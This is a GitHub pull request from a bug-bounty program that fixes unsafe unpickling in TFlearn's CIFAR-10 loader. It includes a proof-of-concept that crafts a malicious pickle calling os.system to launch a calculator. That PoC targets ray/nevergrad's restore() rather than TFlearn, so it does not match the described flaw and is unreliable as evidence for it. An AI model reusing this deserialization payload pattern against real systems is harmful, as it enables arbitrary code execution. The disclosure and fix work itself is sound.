8000 RCE Fixed by Anon-Artist · Pull Request #1 · 418sec/tflearn · GitHub
[go: up one dir, main page]
Skip to content
This repository was archived by the owner on Dec 19, 2023. It is now read-only.

RCE Fixed#1

Merged
JamieSlome merged 3 commits into418sec:masterfrom
Anon-Artist:patch-1
Jan 25, 2021
Merged

RCE Fixed#1
JamieSlome merged 3 commits into418sec:masterfrom
Anon-Artist:patch-1

Conversation

@Anon-Artist
Copy link
@Anon-Artist Anon-Artist commented Jan 10, 2021
edited by JamieSlome
Loading

📊 Metadata *

TFlearn is a modular and transparent deep learning library built on top of Tensorflow. It was designed to provide a higher-level API to TensorFlow in order to facilitate and speed-up experimentations, while remaining fully transparent and compatible with it. This package was vulnerable to Arbitrary Code Execution.

Bounty URL: https://www.huntr.dev/bounties/1-pip-tflearn

⚙️ Description *

load_batch() function is used to load CIFAR 10 dataset for training. Lack of restriction in input allowes attacker-crafted file to get unpickled which causes code execution.

💻 Technical Description *

Fixed by avoiding unsafe loader.

🐛 Proof of Concept (PoC) *

Create the following PoC file:
exploit.py

import pickle
import os
import nevergrad
from ray.tune.suggest.nevergrad import NevergradSearch

class EvilPickle(object):
    def __reduce__(self):
        return (os.system, ('calc.exe', ))

payload = pickle.dumps(EvilPickle())
optimizer = nevergrad.optimization.Optimizer(1)
ngSearch = NevergradSearch(optimizer)

with open('payload', 'wb') as f:
    f.write(payload)

ngSearch.restore('payload')

Execute the following commands in another terminal:

python3 exploit.py

Check the Output:

xcalc will pop up.

🔥 Proof of Fix (PoF) *

After fix it will not popup a calc.

👍 User Acceptance Testing (UAT)

After fix functionality is unaffected.

@Anon-Artist Anon-Artist changed the title Update cifar10.py RCE Fixed Jan 10, 2021
mzfr
mzfr approved these changes Jan 10, 2021
View reviewed changes
Copy link
@mzfr mzfr left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

LGTM

@JamieSlome JamieSlome merged commit 6d12e1f into 418sec:master Jan 25, 2021
@huntr-helper huntr-helper mentioned this pull request Jan 25, 2021
Open
@huntr-helper
Copy link
huntr-helper commented Jan 25, 2021

Congratulations Anon-Artist - your fix has been selected! 🎉

Thanks for being part of the community & helping secure the world's open source code.
If you have any questions, please respond in the comments section, or hit us up on Discord. Your bounty is on its way - keep hunting!

Come join us on Discord

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.

Reviewers

@bbeale bbeale Awaiting requested review from bbeale

@Mik317 Mik317 Awaiting requested review from Mik317

@mufeedvh mufeedvh Awaiting requested review from mufeedvh

1 more reviewer

@mzfr mzfr mzfr approved these changes

5410 Reviewers whose approvals may not affect merge requirements

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

4 participants

@Anon-Artist @huntr-helper @mzfr @JamieSlome
0